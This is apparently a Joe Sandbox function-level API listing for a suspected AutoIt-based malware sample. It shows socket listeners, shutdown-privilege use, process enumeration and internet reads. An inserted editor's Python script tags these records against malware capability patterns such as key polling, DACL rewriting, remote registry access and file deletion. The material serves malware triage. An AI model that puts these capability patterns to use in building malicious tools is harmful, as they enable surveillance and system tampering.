                          • Instruction ID: c13539fc8aa45d3d5ba86e87d1efa068ee5f3d0a5bdc340fdf22532171bfc6a5
                          • Opcode Fuzzy Hash: 09eb6aeb1655a68ef1e3d41019dd226fdeadf6f1d7cfc7bb02c2fa457e789c33
                          • Instruction Fuzzy Hash: A7912971D00228ABDB10DF95DC95EEEBBB8EF48710F10812AF515B7291DB705A45CFA0
                          APIs
                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 009213DC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: lstrlen
                          • String ID: ($AddRef$InterfaceDispatch$QueryInterface$Release$|
                          • API String ID: 1659193697-2318614619
                          • Opcode ID: 3039cbe9962e5a89e78f66ac6e39ee14342b9b29e5f6feb6aa8d75a6657e0bf7
                          • Instruction ID: 97719c8eb6c69d7d8b8bcaa79fce38794b39363dffe693993a4823d975e69b38
                          • Opcode Fuzzy Hash: 3039cbe9962e5a89e78f66ac6e39ee14342b9b29e5f6feb6aa8d75a6657e0bf7
                          • Instruction Fuzzy Hash: 90325674A007159FC728DF29D480A6AB7F0FF58320B11C46EE59ADB3A6E770E991CB44
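
The function records above are only useful when each record's API set is read as a capability: the key-state polling loop at 00922B5F..00922CA8, the user-object DACL rewrite at 0091A6D0..0091A834 (GetUserObjectSecurity, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity), RegConnectRegistryW at 0094328E, the *.* enumerate-and-DeleteFileW loop at 00926474..00926506, CoInitializeSecurity plus CoCreateInstanceEx at 0093C235..0093C38C, and the clipboard record whose only surviving summary is the API ID "Clipboard$AllocCloseEmptyGlobalOpen". The script below is an added example by the editor, not part of the Joe Sandbox report and not code from AutoIt or from the sample: it parses this listing format, groups bullet lines per function record (a record ends at its "Instruction Fuzzy Hash" line), tags each record by the API set it contains or by words in its "API ID" summary when the bullets were not rendered, and decodes the virtual-key argument of each GetAsyncKeyState/GetKeyState call. The tag rules, the virtual-key table and the SAMPLE excerpt are the author's constructions (the excerpt is abbreviated from the lines above). Two caveats for triage: the @GUI_DRAGFILE/@GUI_DROPID macro strings and the PCRE option strings (UCP), UTF16), LIMIT_RECURSION=) in this dump are, in the editor's assessment, consistent with the AutoIt3 runtime, so a tag describes what the embedded interpreter can do rather than what the compiled script necessarily does; and the codes polled at 00922BE0..00922CA8 (000000A0, 000000A1, 00000011, 00000012, 0000005B) are the Win32 values for left/right Shift, Ctrl, Alt and the left Windows key, which is modifier-state checking rather than logging of typed characters.

```python
"""Triage helper for Joe Sandbox function-level API listings.

Added example: not part of the Joe Sandbox report, of AutoIt or of the
analysed sample.  Tag rules, VK table and SAMPLE are the author's own.
"""
import re
from dataclasses import dataclass, field

# "• Api.MODULE(args), ref: ADDR", optionally prefixed "Part of subcall function ADDR:"
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
API_ID_LINE = re.compile(r"^\s*•\s*API ID:\s*(?P<value>.*?)\s*$")
END_LINE = re.compile(r"^\s*•\s*Instruction Fuzzy Hash:")  # last line of a record

# Win32 virtual-key codes (winuser.h) for modifier keys; others are reported by number.
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
            0x5C: "VK_RWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL",
            0xA3: "VK_RCONTROL", 0xA4: "VK_LMENU", 0xA5: "VK_RMENU"}

# (tag, APIs that must all be present, words that must appear in the "API ID" line).
# The keyword form covers records whose bullet list was not rendered.  Author's rules.
RULES = [
    ("keyboard state polling", {"GetKeyboardState", "GetAsyncKeyState", "GetKeyState"}, set()),
    ("user-object DACL modification",
     {"GetUserObjectSecurity", "AddAce", "SetSecurityDescriptorDacl", "SetUserObjectSecurity"}, set()),
    ("remote registry access", {"RegConnectRegistryW"}, set()),
    ("recursive file deletion", {"FindFirstFileW", "FindNextFileW", "DeleteFileW"}, set()),
    ("DCOM object activation", {"CoInitializeSecurity", "CoCreateInstanceEx"}, set()),
    ("clipboard access", set(), {"Clipboard"}),
]


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)  # (api, module, args, ref, subcall_of)
    api_id: str = ""

    @property
    def apis(self) -> set:
        return {call[0] for call in self.calls}

    def tags(self) -> list:
        found = []
        for tag, required, keywords in RULES:
            by_calls = bool(required) and required <= self.apis
            by_summary = any(word in self.api_id for word in keywords)
            if by_calls or by_summary:
                found.append(tag)
        return found

    def polled_keys(self) -> list:
        """Decode the first argument of each key-state call into a VK name."""
        names = []
        for api, _mod, args, _ref, _sub in self.calls:
            first = args.split(",")[0] if args else ""
            if api in ("GetAsyncKeyState", "GetKeyState") and re.fullmatch(r"[0-9A-F]+", first):
                code = int(first, 16)
                names.append(VK_NAMES.get(code, f"VK_0x{code:02X}"))
        return names


def parse_listing(text: str) -> list:
    """Split a listing into FunctionRecords, one per 'Instruction Fuzzy Hash' line."""
    records, current = [], FunctionRecord()
    for line in text.splitlines():
        if m := API_LINE.match(line):
            current.calls.append((m["api"], m["mod"], m["args"] or "", m["ref"], m["sub"]))
        elif m := API_ID_LINE.match(line):
            current.api_id = m["value"]
        elif END_LINE.match(line):
            records.append(current)
            current = FunctionRecord()
    if current.calls or current.api_id:  # trailing record cut off before its hash line
        records.append(current)
    return records


def triage(text: str) -> list:
    """Return (tags, polled virtual keys) per function record, in listing order."""
    return [(rec.tags(), rec.polled_keys()) for rec in parse_listing(text)]


# Constructed excerpt in the report's format, abbreviated from the listing above.
SAMPLE = """\
APIs
• GetKeyboardState.USER32(?), ref: 00922B5F
• GetAsyncKeyState.USER32(000000A0), ref: 00922BE0
• GetKeyState.USER32(000000A0), ref: 00922BFB
• GetAsyncKeyState.USER32(00000011), ref: 00922C42
• GetAsyncKeyState.USER32(0000005B), ref: 00922C96
• API ID: State$Async$Keyboard
• Instruction Fuzzy Hash: D341FA30A087D97DFF31DB60A8043B9BEA86F12314F04809DD5C6566C9DBE499C8C7A2
APIs
  • Part of subcall function 0091ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0091ABD7
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0091A6D0
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0091A76E
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0091A820
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 0091A834
• API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl
• Instruction Fuzzy Hash: 9F516B71A01209AFDF01DFA1DC44AEEBBB9FF04310F048169F821A72A1DB749E46DB61
APIs
• _memset.LIBCMT ref: 0094F081
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0094328E
• API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
• Instruction Fuzzy Hash: 5CE15B31604210AFCB14DF29C995E6ABBE8FF89310F04896DF55AD72A2DB30ED05CB52
APIs
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• Instruction Fuzzy Hash: CE21AE31715210AFDB11AF69DC49B2D77A8FF44710F05841AF96ADB2A1CBB4ED009FA1
"""

if __name__ == "__main__":
    for index, (tags, keys) in enumerate(triage(SAMPLE)):
        print(f"record {index}: tags={tags} polled_keys={keys}")
```

Run it as-is to see the four records tagged; to use it on a real report, paste the "APIs" through "Instruction Fuzzy Hash" text of the function records into `triage()`. The per-record grouping matters: a single GetAsyncKeyState call in a GUI helper is noise, while the three key-state APIs together in one function, polled for modifier codes only, is the pattern above, and the subcall prefix is kept (the `sub` field) so that a capability inherited from a helper such as 0091ABBB is not mistaken for a direct call.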
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • GetSystemMetrics.USER32(0000000F), ref: 0095016D
                          • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0095038D
                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 009503AB
                          • InvalidateRect.USER32(?,00000000,00000001,?), ref: 009503D6
                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 009503FF
                          • ShowWindow.USER32(00000003,00000000), ref: 00950421
                          • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 00950440
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$MessageSend$DialogInvalidateLongMetricsMoveNtdllProc_RectShowSystem
                          • String ID:
                          • API String ID: 2922825909-0
                          • Opcode ID: bcc754571d6599adae812b4b71892a6c4fea8a4d52e8a7b1878f22e026c95c10
                          • Instruction ID: 2069e748aea80222bca4405a78c5cb4c88496f4930dd7a04917046e6dc9bcfef
                          • Opcode Fuzzy Hash: bcc754571d6599adae812b4b71892a6c4fea8a4d52e8a7b1878f22e026c95c10
                          • Instruction Fuzzy Hash: 0BA1D031600616EFDB18CF69C9897BDBBB5FF88742F088119EC58A7290D774AD54CB90
                          APIs
                            • Part of subcall function 0091B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0091B180
                            • Part of subcall function 0091B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0091B1AD
                            • Part of subcall function 0091B134: GetLastError.KERNEL32 ref: 0091B1BA
                          • ExitWindowsEx.USER32(?,00000000), ref: 00927A0F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                          • String ID: $@$SeShutdownPrivilege
                          • API String ID: 2234035333-194228
                          • Opcode ID: 68745a3ad23ba776feb5de9669096998737ffa9ce03bf7435bf9ff420bda83b6
                          • Instruction ID: 482041a5d8bb113833d04cdd895009298a38f76940883d3424828a9e1a08a987
                          • Opcode Fuzzy Hash: 68745a3ad23ba776feb5de9669096998737ffa9ce03bf7435bf9ff420bda83b6
                          • Instruction Fuzzy Hash: E401F77176D2326AF72816E8AC5BBBFB25C9B00360F140828F913B20D6D5A45E0081B4
                          APIs
                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00938CA8
                          • WSAGetLastError.WS2_32(00000000), ref: 00938CB7
                          • bind.WS2_32(00000000,?,00000010), ref: 00938CD3
                          • listen.WS2_32(00000000,00000005), ref: 00938CE2
                          • WSAGetLastError.WS2_32(00000000), ref: 00938CFC
                          • closesocket.WS2_32(00000000), ref: 00938D10
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorLast$bindclosesocketlistensocket
                          • String ID:
                          • API String ID: 1279440585-0
                          • Opcode ID: cde8ed9a725b3f86327bed10bfee8a11edc2bf6e51afeb712b13a04bbe17c85b
                          • Instruction ID: 959bfc7c9ca10c981a870551439fe19059588a14bcdfd310489c1725bcafa3ab
                          • Opcode Fuzzy Hash: cde8ed9a725b3f86327bed10bfee8a11edc2bf6e51afeb712b13a04bbe17c85b
                          • Instruction Fuzzy Hash: 1521B171600200AFCB10EF68D945B6EB7A9FF49710F108558F966A73D2CB70AD419B62
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00926554
                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00926564
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00926583
                          • __wsplitpath.LIBCMT ref: 009265A7
                          • _wcscat.LIBCMT ref: 009265BA
                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 009265F9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                          • String ID:
                          • API String ID: 1605983538-0
                          • Opcode ID: 4a45f2e11ed6ef927192df1f21c8fba97154a01ab7f9467e2e313f4b751fee84
                          • Instruction ID: 2d49e8bd775d21d605b3d2eb69961f6d9be85a51369a01b707fd2f4f4d91c15e
                          • Opcode Fuzzy Hash: 4a45f2e11ed6ef927192df1f21c8fba97154a01ab7f9467e2e313f4b751fee84
                          • Instruction Fuzzy Hash: 0B21A471904228AFDB10ABA4DC88FEEB7BCAB49300F5004A9F505E3145EBB59F85DB60
                          APIs
                            • Part of subcall function 0093A82C: inet_addr.WS2_32(00000000), ref: 0093A84E
                          • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00939296
                          • WSAGetLastError.WS2_32(00000000,00000000), ref: 009392B9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorLastinet_addrsocket
                          • String ID:
                          • API String ID: 4170576061-0
                          • Opcode ID: cbd6ab6d26ae7bae0f6c6f0666900d5a49546fb99701f9754e4766370ef09e7c
                          • Instruction ID: 5ba4ddbfc846462bc3880757d1e2cedfc97061a4b30cf42c367b394104765a84
                          • Opcode Fuzzy Hash: cbd6ab6d26ae7bae0f6c6f0666900d5a49546fb99701f9754e4766370ef09e7c
                          • Instruction Fuzzy Hash: 1941A070600604AFDB10AB68C846E7E77EDEF44724F14444CFA66EB3D2DBB49D018BA2
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 0092EB8A
                          • _wcscmp.LIBCMT ref: 0092EBBA
                          • _wcscmp.LIBCMT ref: 0092EBCF
                          • FindNextFileW.KERNEL32(00000000,?), ref: 0092EBE0
                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0092EC0E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Find$File_wcscmp$CloseFirstNext
                          • String ID:
                          • API String ID: 2387731787-0
                          • Opcode ID: db8f9b5f0671d51b4dd424ce186d1cf27ba8e491c3c6c29c5bf265eea0faca7f
                          • Instruction ID: 0e1728ac2c0c0702da2ac7d3adb2abf0ebd2ad700c298d64ff246aad3db41cb7
                          • Opcode Fuzzy Hash: db8f9b5f0671d51b4dd424ce186d1cf27ba8e491c3c6c29c5bf265eea0faca7f
                          • Instruction Fuzzy Hash: ED41AD356046029FCB08DF68D4D1AAAB3E8FF49324F10455DFA6ACB3A1DB71A944CB91
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                          • String ID:
                          • API String ID: 292994002-0
                          • Opcode ID: 207b20e5dc9916ab3b08b0d6f445cbff1de8ae3b5c7bc7cf04c4a2fa6974251d
                          • Instruction ID: ae4bae48a3b801644078a75f5fe8b522de45217521d797a673d2f064ed06fec8
                          • Opcode Fuzzy Hash: 207b20e5dc9916ab3b08b0d6f445cbff1de8ae3b5c7bc7cf04c4a2fa6974251d
                          • Instruction Fuzzy Hash: 6E11C1317092146FE7216F2ADC44E6FBB9DEF48760B05042EF84AD7281CF70E90286A5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                          • API String ID: 0-1546025612
                          • Opcode ID: b86ec5594739f4bf709efff0322cb36ee4e7f3b8b53ff9c9fdb475b79ecb53d5
                          • Instruction ID: 3e19f1f9db0910f692af8e1d93f938aa81038b0babec188ebbccff8924fbf26d
                          • Opcode Fuzzy Hash: b86ec5594739f4bf709efff0322cb36ee4e7f3b8b53ff9c9fdb475b79ecb53d5
                          • Instruction Fuzzy Hash: A792BCB1E0025ACBDF28CF59C8807BDB7B1FB55314F14819AE856EB280E771AD81CB91
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • GetCursorPos.USER32(?), ref: 0094F211
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0095E4C0,?,?,?,?,?), ref: 0094F226
                          • GetCursorPos.USER32(?), ref: 0094F270
                          • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0095E4C0,?,?,?), ref: 0094F2A6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                          • String ID:
                          • API String ID: 1423138444-0
                          • Opcode ID: 898c54aecd94bef99291ff7a888e74c3b1ea3b9021501edb53fdbba3c271f3d7
                          • Instruction ID: debc29b4f4f9e9fe7d79e0d48de3c91773eff1000244024ee7889742f0e0b2cb
                          • Opcode Fuzzy Hash: 898c54aecd94bef99291ff7a888e74c3b1ea3b9021501edb53fdbba3c271f3d7
                          • Instruction Fuzzy Hash: EF21B139601028EFDB258F94C868EFE7BB9FF0A310F084069F915872A1D3749D50EB90
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • NtdllDialogWndProc_W.NTDLL(?,00000020,?,00000000), ref: 008FB5A5
                          • GetClientRect.USER32(?,?), ref: 0095E69A
                          • GetCursorPos.USER32(?), ref: 0095E6A4
                          • ScreenToClient.USER32(?,?), ref: 0095E6AF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                          • String ID:
                          • API String ID: 1010295502-0
                          • Opcode ID: c54dbc24f1353d3763f0fa8a6db4149327a04cc30c28773f2f6b14b84121b3ed
                          • Instruction ID: 5a28fc6ccf2db5ccd1a22dfa1687c9579984239f735c467a873f5bb53944c372
                          • Opcode Fuzzy Hash: c54dbc24f1353d3763f0fa8a6db4149327a04cc30c28773f2f6b14b84121b3ed
                          • Instruction Fuzzy Hash: 30112231A0502EBFCB14DFA8C8899BE7BB8FB09309F000455FA52E6140D774AA95DBA1
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 008FB22F
                            • Part of subcall function 008FB55D: NtdllDialogWndProc_W.NTDLL(?,00000020,?,00000000), ref: 008FB5A5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: DialogNtdllProc_$LongWindow
                          • String ID:
                          • API String ID: 1155049231-0
                          • Opcode ID: 090cccdadcbdd5c69cb557de5ce52e71349a66d7898eba7349b5a516457fc2f2
                          • Instruction ID: e90db38b7f8cd6430136f5ae4971100554c164eb8277e54f48ecf0fdfa1174f5
                          • Opcode Fuzzy Hash: 090cccdadcbdd5c69cb557de5ce52e71349a66d7898eba7349b5a516457fc2f2
                          • Instruction Fuzzy Hash: E1A1256011810DFADB2CAF3ADC98E7F395CFB86369F144119FA02D2592DB369D11A372
                          APIs
                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009343BF,00000000), ref: 00934FA6
                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00934FD2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
